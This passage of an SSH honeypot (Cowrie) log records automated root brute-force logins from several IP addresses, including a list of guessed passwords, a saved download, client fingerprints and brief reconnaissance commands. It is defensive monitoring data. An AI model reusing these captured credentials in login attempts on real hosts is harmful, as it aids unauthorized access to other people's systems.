{"eventid":"cowrie.login.success","username":"root","password":"44442222","message":"login attempt [root/44442222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.132000Z","src_ip":"212.227.235.229","session":"fc34219ac5fb"}
{"eventid":"cowrie.login.success","username":"root","password":"33330000","message":"login attempt [root/33330000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.133499Z","src_ip":"212.227.235.229","session":"a43eab8412d9"}
{"eventid":"cowrie.login.success","username":"root","password":"77772222","message":"login attempt [root/77772222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.134881Z","src_ip":"212.227.235.229","session":"e99417fb9e2d"}
{"eventid":"cowrie.login.success","username":"root","password":"99996666","message":"login attempt [root/99996666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.139396Z","src_ip":"212.227.235.229","session":"bb223433a77b"}
{"eventid":"cowrie.login.success","username":"root","password":"99990000","message":"login attempt [root/99990000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.141273Z","src_ip":"212.227.235.229","session":"ddc6ba19e5d8"}
{"eventid":"cowrie.login.success","username":"root","password":"99997777","message":"login attempt [root/99997777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.142861Z","src_ip":"212.227.235.229","session":"e1463557670c"}
{"eventid":"cowrie.login.success","username":"root","password":"88887777","message":"login attempt [root/88887777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.144497Z","src_ip":"212.227.235.229","session":"9ca1e36b2b7e"}
{"eventid":"cowrie.login.success","username":"root","password":"33339999","message":"login attempt [root/33339999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.145672Z","src_ip":"212.227.235.229","session":"a8bab1c24cae"}
{"eventid":"cowrie.login.success","username":"root","password":"77778888","message":"login attempt [root/77778888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.147477Z","src_ip":"212.227.235.229","session":"332fe0278a20"}
{"eventid":"cowrie.login.success","username":"root","password":"44446666","message":"login attempt [root/44446666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.149529Z","src_ip":"212.227.235.229","session":"1d3a81a22da1"}
{"eventid":"cowrie.login.success","username":"root","password":"77770000","message":"login attempt [root/77770000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.151043Z","src_ip":"212.227.235.229","session":"fde3d4957d1d"}
{"eventid":"cowrie.login.success","username":"root","password":"77779999","message":"login attempt [root/77779999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.152183Z","src_ip":"212.227.235.229","session":"06e119849a47"}
{"eventid":"cowrie.login.success","username":"root","password":"99993333","message":"login attempt [root/99993333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.153554Z","src_ip":"212.227.235.229","session":"a7fb1045ea4e"}
{"eventid":"cowrie.login.success","username":"root","password":"22223333","message":"login attempt [root/22223333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.154704Z","src_ip":"212.227.235.229","session":"3af3551e559a"}
{"eventid":"cowrie.login.success","username":"root","password":"88884444","message":"login attempt [root/88884444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.156070Z","src_ip":"212.227.235.229","session":"121b33cc47b8"}
{"eventid":"cowrie.login.success","username":"root","password":"66663333","message":"login attempt [root/66663333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.157158Z","src_ip":"212.227.235.229","session":"cac46166befb"}
{"eventid":"cowrie.login.success","username":"root","password":"66669999","message":"login attempt [root/66669999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.158928Z","src_ip":"212.227.235.229","session":"4eb130214edc"}
{"eventid":"cowrie.login.success","username":"root","password":"44441111","message":"login attempt [root/44441111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.160269Z","src_ip":"212.227.235.229","session":"6a5a636f9f6f"}
{"eventid":"cowrie.login.success","username":"root","password":"77771111","message":"login attempt [root/77771111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.161634Z","src_ip":"212.227.235.229","session":"63717d934c39"}
{"eventid":"cowrie.login.success","username":"root","password":"77773333","message":"login attempt [root/77773333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.162796Z","src_ip":"212.227.235.229","session":"3f8ce3773c93"}
{"eventid":"cowrie.login.success","username":"root","password":"99991111","message":"login attempt [root/99991111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.164282Z","src_ip":"212.227.235.229","session":"77c93a0a84fd"}
{"eventid":"cowrie.login.success","username":"root","password":"66662222","message":"login attempt [root/66662222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.165361Z","src_ip":"212.227.235.229","session":"3caa18dff26e"}
{"eventid":"cowrie.login.success","username":"root","password":"99995555","message":"login attempt [root/99995555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.166907Z","src_ip":"212.227.235.229","session":"5f056f60eac9"}
{"eventid":"cowrie.login.success","username":"root","password":"99998888","message":"login attempt [root/99998888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.168600Z","src_ip":"212.227.235.229","session":"715ead766c5a"}
{"eventid":"cowrie.login.success","username":"root","password":"88881111","message":"login attempt [root/88881111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.170008Z","src_ip":"212.227.235.229","session":"074f2d5f0242"}
{"eventid":"cowrie.login.success","username":"root","password":"66661111","message":"login attempt [root/66661111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.171295Z","src_ip":"212.227.235.229","session":"32549e7f67c3"}
{"eventid":"cowrie.login.success","username":"root","password":"99994444","message":"login attempt [root/99994444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.172765Z","src_ip":"212.227.235.229","session":"ac3b76fe0c62"}
{"eventid":"cowrie.login.success","username":"root","password":"44440000","message":"login attempt [root/44440000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.177362Z","src_ip":"212.227.235.229","session":"14fb9817bbbb"}
{"eventid":"cowrie.login.success","username":"root","password":"44449999","message":"login attempt [root/44449999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.179149Z","src_ip":"212.227.235.229","session":"55425aaf0800"}
{"eventid":"cowrie.login.success","username":"root","password":"88880000","message":"login attempt [root/88880000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.180760Z","src_ip":"212.227.235.229","session":"e110aea31c80"}
{"eventid":"cowrie.login.success","username":"root","password":"77775555","message":"login attempt [root/77775555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.183715Z","src_ip":"212.227.235.229","session":"ca683d3fbce3"}
{"eventid":"cowrie.login.success","username":"root","password":"33335555","message":"login attempt [root/33335555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.185488Z","src_ip":"212.227.235.229","session":"bfd93fdc57bc"}
{"eventid":"cowrie.login.success","username":"root","password":"66660000","message":"login attempt [root/66660000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.186647Z","src_ip":"212.227.235.229","session":"cad1ddcc5153"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.189544Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.190391Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.191426Z","src_ip":"212.227.235.229","session":"2430e4d818c9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.192221Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.227739Z","src_ip":"212.227.235.229","session":"ab9d14443839"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.229437Z","src_ip":"212.227.235.229","session":"4424eb9da624"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.231346Z","src_ip":"212.227.235.229","session":"3382f8a53ed9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.232862Z","src_ip":"212.227.235.229","session":"9c9709ab59ff"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.234091Z","src_ip":"212.227.235.229","session":"170af46275dd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.235531Z","src_ip":"212.227.235.229","session":"951177aa0a0b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.237136Z","src_ip":"212.227.235.229","session":"97fa839b012c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.238447Z","src_ip":"212.227.235.229","session":"bb7e9b4a50bd"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.239413Z","src_ip":"212.227.235.229","session":"7e52beeaac9c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.240476Z","src_ip":"212.227.235.229","session":"8b0ca0bc3615"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.241554Z","src_ip":"212.227.235.229","session":"b441f970325b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.242656Z","src_ip":"212.227.235.229","session":"41f5516ca362"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.243506Z","src_ip":"212.227.235.229","session":"50b85e1c00f1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.244601Z","src_ip":"212.227.235.229","session":"2546c7392178"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.245672Z","src_ip":"212.227.235.229","session":"67fe3aa5cc13"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.246629Z","src_ip":"212.227.235.229","session":"e99417fb9e2d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.247614Z","src_ip":"212.227.235.229","session":"91b2814f6688"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.248484Z","src_ip":"212.227.235.229","session":"fc34219ac5fb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.249374Z","src_ip":"212.227.235.229","session":"a43eab8412d9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.251227Z","src_ip":"212.227.235.229","session":"62dbea63fe87"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.266013Z","src_ip":"212.227.235.229","session":"bb223433a77b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.266977Z","src_ip":"212.227.235.229","session":"ddc6ba19e5d8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.268468Z","src_ip":"212.227.235.229","session":"9ca1e36b2b7e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.269667Z","src_ip":"212.227.235.229","session":"e1463557670c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.271593Z","src_ip":"212.227.235.229","session":"332fe0278a20"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.272825Z","src_ip":"212.227.235.229","session":"06e119849a47"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.274222Z","src_ip":"212.227.235.229","session":"a7fb1045ea4e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.275235Z","src_ip":"212.227.235.229","session":"fde3d4957d1d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.276278Z","src_ip":"212.227.235.229","session":"1d3a81a22da1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.277235Z","src_ip":"212.227.235.229","session":"a8bab1c24cae"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.278219Z","src_ip":"212.227.235.229","session":"121b33cc47b8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.279263Z","src_ip":"212.227.235.229","session":"cac46166befb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.281426Z","src_ip":"212.227.235.229","session":"4eb130214edc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.282346Z","src_ip":"212.227.235.229","session":"3af3551e559a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.283115Z","src_ip":"212.227.235.229","session":"ac3b76fe0c62"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.284103Z","src_ip":"212.227.235.229","session":"77c93a0a84fd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.284899Z","src_ip":"212.227.235.229","session":"63717d934c39"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.286906Z","src_ip":"212.227.235.229","session":"3caa18dff26e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.288549Z","src_ip":"212.227.235.229","session":"3f8ce3773c93"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.289441Z","src_ip":"212.227.235.229","session":"5f056f60eac9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.290197Z","src_ip":"212.227.235.229","session":"715ead766c5a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.291187Z","src_ip":"212.227.235.229","session":"074f2d5f0242"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.292361Z","src_ip":"212.227.235.229","session":"6a5a636f9f6f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.294192Z","src_ip":"212.227.235.229","session":"32549e7f67c3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.297769Z","src_ip":"212.227.235.229","session":"14fb9817bbbb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.298620Z","src_ip":"212.227.235.229","session":"55425aaf0800"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.299762Z","src_ip":"212.227.235.229","session":"e110aea31c80"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.300731Z","src_ip":"212.227.235.229","session":"ca683d3fbce3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.302284Z","src_ip":"212.227.235.229","session":"cad1ddcc5153"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.304537Z","src_ip":"212.227.235.229","session":"bfd93fdc57bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37128,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b68d3c489bb","protocol":"ssh","message":"New connection: 212.227.125.160:37128 (1.2.3.4:22) [session: 3b68d3c489bb]","sensor":"my-vps","timestamp":"2025-08-28T22:15:09.868938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:15:10.899137Z","src_ip":"212.227.125.160","session":"3b68d3c489bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:15:10.899813Z","src_ip":"212.227.125.160","session":"3b68d3c489bb"}
{"eventid":"cowrie.login.success","username":"root","password":"G0t!","message":"login attempt [root/G0t!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:15:17.201607Z","src_ip":"212.227.125.160","session":"3b68d3c489bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:15:22.701353Z","src_ip":"212.227.125.160","session":"3b68d3c489bb"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T22:15:22.702273Z","src_ip":"212.227.125.160","session":"3b68d3c489bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:15:24.141915Z","src_ip":"212.227.125.160","session":"3b68d3c489bb"}
{"eventid":"cowrie.session.closed","duration":"14.3","message":"Connection lost after 14.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:15:24.143397Z","src_ip":"212.227.125.160","session":"3b68d3c489bb"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":41798,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d088a592550","protocol":"ssh","message":"New connection: 201.148.180.50:41798 (1.2.3.4:22) [session: 7d088a592550]","sensor":"my-vps","timestamp":"2025-08-28T22:15:28.950634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:15:30.232229Z","src_ip":"201.148.180.50","session":"7d088a592550"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:15:30.233033Z","src_ip":"201.148.180.50","session":"7d088a592550"}
{"eventid":"cowrie.login.success","username":"root","password":"G0t!","message":"login attempt [root/G0t!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:15:37.079759Z","src_ip":"201.148.180.50","session":"7d088a592550"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:15:40.273549Z","src_ip":"201.148.180.50","session":"7d088a592550"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T22:15:40.274199Z","src_ip":"201.148.180.50","session":"7d088a592550"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:15:41.860797Z","src_ip":"201.148.180.50","session":"7d088a592550"}
{"eventid":"cowrie.session.closed","duration":"12.9","message":"Connection lost after 12.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:15:41.862257Z","src_ip":"201.148.180.50","session":"7d088a592550"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62520,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e34f30713ef","protocol":"ssh","message":"New connection: 217.72.205.35:62520 (1.2.3.4:22) [session: 0e34f30713ef]","sensor":"my-vps","timestamp":"2025-08-28T22:16:18.931456Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:16:18.932993Z","src_ip":"217.72.205.35","session":"0e34f30713ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29034,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6162992efe4","protocol":"ssh","message":"New connection: 212.227.125.160:29034 (1.2.3.4:22) [session: a6162992efe4]","sensor":"my-vps","timestamp":"2025-08-28T22:17:03.072900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:17:03.074131Z","src_ip":"212.227.125.160","session":"a6162992efe4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS"